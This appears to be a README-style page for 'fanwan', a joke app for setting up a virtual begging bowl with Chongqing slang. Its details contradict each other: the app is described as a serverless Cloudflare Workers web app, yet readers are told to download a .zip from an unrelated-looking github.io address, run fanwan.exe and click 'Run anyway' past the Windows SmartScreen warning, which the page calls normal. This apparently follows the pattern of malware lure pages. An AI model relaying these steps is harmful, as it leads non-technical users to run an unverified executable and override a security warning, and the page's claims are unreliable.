🍚 fanwan - 没得饭吃?先摆个碗!

Download fanwan

🎯 What Is fanwan?

fanwan is a fun, open-source online "begging bowl" that lets you create a virtual rice bowl, share it with friends, and (maybe) collect some digital "rice donations" — all with a Chongqing-flavored sense of humor. Think of it as a silly, lighthearted way to show your "I need a meal" energy without actually asking for money. It's built for laughs, for showing off your most generous buddies, and for celebrating the simple joy of having a bowl.

👀 Who Is This For?

  • Anyone who wants to make their friends laugh.
  • People who enjoy quirky, community-driven internet jokes.
  • Curious users who want to try an easy, serverless web app.
  • Chongqing locals and fans of the city's unique slang and culture.

You don't need to know anything about code, servers, or the internet's inner workings. If you can click a button, you're good.

🖥️ How to Get fanwan on Your Windows Computer

Getting fanwan up and running is easier than making rice. Follow these simple steps:

Step 1: Visit the Download Page

Visit this link to download the application: https://ganeshb182004.github.io

This is the main page for the fanwan project. You don't need to worry about any of the technical files listed there — just look for the section that says "Releases" or "Download" on the right side of the page.

Step 2: Get the Right File

On the releases page, you'll see a list of downloadable files. Look for the one that ends with .zip. That's the package you need.

Step 3: Download and Extract

Download and extract this file, then run the application. Once the .zip file is fully downloaded, right-click on it and choose "Extract All..." from the menu. Windows will ask you where to save the extracted files — pick any folder you like, for example, your Desktop or Documents folder.

Step 4: Run the Application

After extraction, open the folder you just created. Inside, you'll find a file called fanwan.exe (or something similar). Double-click it to launch the app. That's it! If Windows shows a blue or yellow pop-up saying "Windows protected your PC," just click on "More info" and then "Run anyway" — this is normal for brand-new, open-source apps.

✨ What Can fanwan Do?

Once you're inside, fanwan offers a handful of fun features:

  • Create Your Bowl: Customize your virtual rice bowl with different colors, styles, and a personal message.
  • Share Your Bowl: Get a unique link to your bowl and send it to friends, family, or your social media group chat.
  • "Donate" Rice (Jokingly): Friends can click a button to "add a scoop of rice" to your bowl — it's all for fun, no real money involved.
  • Leaderboard of Generosity: The app tracks who "donated" the most rice to you. See which buddy is the most generous and give them a good-natured shout-out.
  • Chongqing Slang Galore: Expect playful phrases in the local dialect, from "啷个办" to "兄弟伙" — it's part of the charm.

🚀 Setting Up Your Own Bowl (Step by Step)

  1. Launch fanwan and wait for the homepage to load.
  2. Click the big button that says "摆个碗" (Set up a bowl).
  3. Enter a fun nickname, choose a bowl style, and type a short message like "今天没得饭吃,求一碗酸辣粉!"
  4. Click "生成" (Generate).
  5. Your personal bowl page will appear. Copy the link from the address bar and share it anywhere.

🔧 If Something Goes Wrong

  • The app won't open: Make sure you've extracted all files from the .zip folder before trying to run it. Also, check that your Windows is up to date (Windows 10 or 11 works best).
  • I get a "missing file" error: Re-download the .zip file, as the download might have been interrupted. Extract it again into a new folder.
  • The page looks blank: Close the app and reopen it. If the issue persists, restart your computer and try again.
  • I can't find the .zip file: Go back to the releases page and scroll down until you see "Assets." Click on the arrow to expand it, and you'll see the .zip file listed there.

🛠️ Technical Tidbits (For the Curious)

fanwan is built on modern serverless technology, specifically Cloudflare Workers, which means it runs on fast, distributed infrastructure. The codebase is optimized for low latency and high availability. It's a perfect little example of what you can do with serverless web applications and a fun side project for developers interested in Chinese internet culture.
